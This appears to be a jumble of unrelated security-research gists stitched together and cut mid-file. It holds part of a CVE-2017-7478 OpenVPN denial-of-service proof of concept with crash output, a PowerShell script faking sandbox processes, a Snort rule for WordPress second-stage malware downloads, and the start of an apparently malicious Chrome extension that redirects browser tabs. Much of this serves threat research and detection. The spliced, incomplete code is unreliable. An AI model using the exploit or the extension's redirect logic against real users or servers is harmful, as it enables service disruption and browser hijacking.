
# Usage: ./dns_check.py <list_of_domain_names.txt>
import dns.resolver
import requests
import re
import json
import sys
# Module-wide resolver shared by the checks below. Both dnspython limits are capped at
# 5 seconds: `timeout` bounds a single wait on one nameserver, `lifetime` bounds the
# whole lookup, so one unresponsive server cannot stall the run indefinitely.
resolver = dns.resolver.Resolver()
resolver.timeout = resolver.lifetime = 5
x0rz / dos_server.py
Created May 12, 2017 12:06
CVE-2017-7478: Proof of Concept Code for the OpenVPN Pre-Authentication DoS Vulnerability
#!/usr/bin/env python3
# Script by Quarkslab from https://ostif.org/wp-content/uploads/2017/05/OpenVPN1.2final.pdf
"""
$ ./dos_server.py &
$ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf
...
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf))
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask 255.255.255.0
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
# TCP port the PoC HTTP server is meant to listen on; presumably handed to HTTPServer further
# down the script (not visible here) -- confirm. Non-privileged, so the script needs no root.
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
# Simulate fake processes of analysis sandbox/VM that some malware will try to evade
# This just spawns ping.exe with different names (wireshark.exe, vboxtray.exe, ...)
# It's just a PoC and it's ugly as f*ck but hey, if it works...
# Usage: .\fake_sandbox.ps1 -action {start,stop}
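# -action selects the mode. The usage line documents only start|stop, so reject anything else at
# parameter binding time instead of letting an unexpected value reach the body. ValidateSet matching
# is case-insensitive, so existing callers passing "Start"/"STOP" keep working.
param([Parameter(Mandatory=$true)][ValidateSet("start","stop")][string]$action)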
$fakeProcesses = @("wireshark.exe", "vmacthlp.exe", "VBoxService.exe",
"VBoxTray.exe", "procmon.exe", "ollydbg.exe", "vmware-tray.exe",
import datetime
import os
import sys
import pefile
from scapy.all import *
import scapy_http.http
import tempfile
# Age cutoff used by the checks below: 72 hours, kept as a timedelta so it can be
# compared directly against differences between datetime values.
TIME_THRESHOLD = datetime.timedelta(hours=72)
# Registering your new number
# Register the account, then confirm it with the code Signal sends to that number
# ("xxxxxx" is a placeholder for the received verification code). The number is
# bound once so both commands are guaranteed to use the same account.
NUMBER="+1234568790"
signal-cli -u "$NUMBER" register
signal-cli -u "$NUMBER" verify xxxxxx
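echo "[+] Getting \system\\currentcontrolset\\services"
# Each child key of Services is one installed service or driver; Name holds the full key path.
$raw_services = Get-ChildItem -Path hklm:\system\\currentcontrolset\\services | select Name
# Only the leaf key name is wanted. Split-Path -Leaf takes it straight from the Name string;
# the previous version stringified the whole selected object ("@{Name=...}"), split on "\"
# and trimmed the trailing "}", which depends on PowerShell's object-formatting output rather
# than on the data itself. Collecting with @(...) also avoids re-allocating the array per item.
$services = @($raw_services | ForEach-Object { Split-Path -Leaf $_.Name })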
x0rz / wordpress_snort.rules
Last active September 29, 2017 05:56
Snort rule replacing sid:26576 to detect more second stage download attempts (may raise false positives - to be tested)
# Outbound request (HOME_NET -> EXTERNAL_NET on HTTP_PORTS, established, to_server) whose URI has a
# /wp-includes|admin|content/ path component followed by an executable or archive extension. Meant as a
# wider replacement for sid:26576; legitimate downloads served from an external WordPress site's
# /wp-content/ tree (theme or plugin zips, for instance) will also match, so tune before alerting on it.
# NOTE(review): there is no content: match before the pcre, so the regex is evaluated on every matching
# request rather than being prefiltered by the fast-pattern matcher; a content:"/wp-"; http_uri; in front
# of the pcre would let most traffic be skipped. A standalone "http_uri;" is a sticky buffer in Snort 3
# but a content modifier in Snort 2.x (where the pcre "U" flag already selects the URI buffer) -- confirm
# against the target version. SIDs below 1000000 are reserved for distributed rulesets; a local rule
# should use a SID of 1000000 or higher to avoid colliding with vendor rules.
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC possible infected wordpress second stage download attempt"; flow:to_server,established; http_uri; pcre:"/\/wp-(includes|admin|content)\/.*\.(exe|dll|scr|rar|zip|jar|ps1|bat)/iU";metadata:service http; reference:url,medium.com/@x0rz/threat-hunting-on-simple-tricks-27e64e39f2f0; classtype:trojan-activity; sid:31337; rev:1;)
{
"background": {
"scripts": [ "background.js" ]
},
"browser_action": {
"default_icon": "opurie.png",
"default_popup": "popup.html",
"default_title": "Opurie"
},
"description": "Whiohoo! Welcome back to Opurie",
// Point the active tab at `url`. chrome.tabs.update is called without a tabId, so it
// targets the selected tab of the current window; the value is passed through unmodified.
function redirect(url) {
    var updateProperties = { url: url };
    chrome.tabs.update(updateProperties);
}
var pagebrowsed, allowSearch, prevurl = null,
srchid = 100,
sysid = 739,
random = Math.floor(1e7 * Math.random()),
thanksmsg = [random, "slonif", ".", "faith", "opurie", "com"],